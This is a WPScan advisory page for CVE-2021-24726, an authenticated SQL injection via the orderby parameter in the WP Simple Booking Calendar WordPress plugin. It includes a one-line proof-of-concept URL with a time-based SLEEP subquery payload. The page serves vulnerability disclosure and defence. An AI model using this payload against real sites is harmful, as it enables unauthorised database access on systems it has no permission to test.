WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WP Simple Booking Calendar <= 2.0.6 (before 07/12/2021) - Authenticated SQL Injection

Description

The plugin did not escape, validate or sanitise the orderby parameter in its Search Calendars action, before using it in a SQL statement, leading to an authenticated SQL injection issue

Note (WPScanTeam): The issue was fixed without bumping the version, so there are two 2.0.6 versions out there, one vulnerable, the other with the fix.

Proof of Concept

https://example.com/wp-admin/admin.php?page=wpsbc-calendars&paged=1&s=MyCal&orderby=name,%28SELECT%20*%20FROM%20%28SELECT%28SLEEP%286%29%29%29a%29&paged=1

Affects Plugins

wp-simple-booking-calendar
Fixed in version 2.0.6

References

CVE
CVE-2021-24726
URL
https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=29176

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Martin Vierula of Trustwave

Verified

Yes

WPVDB ID
f85b6033-d7c1-45b7-b3b0-8967f7373bb8

Timeline

Publicly Published

2021-08-06 (about 10 months ago)

Added

2021-08-09 (about 10 months ago)

Last Updated

2022-04-24 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin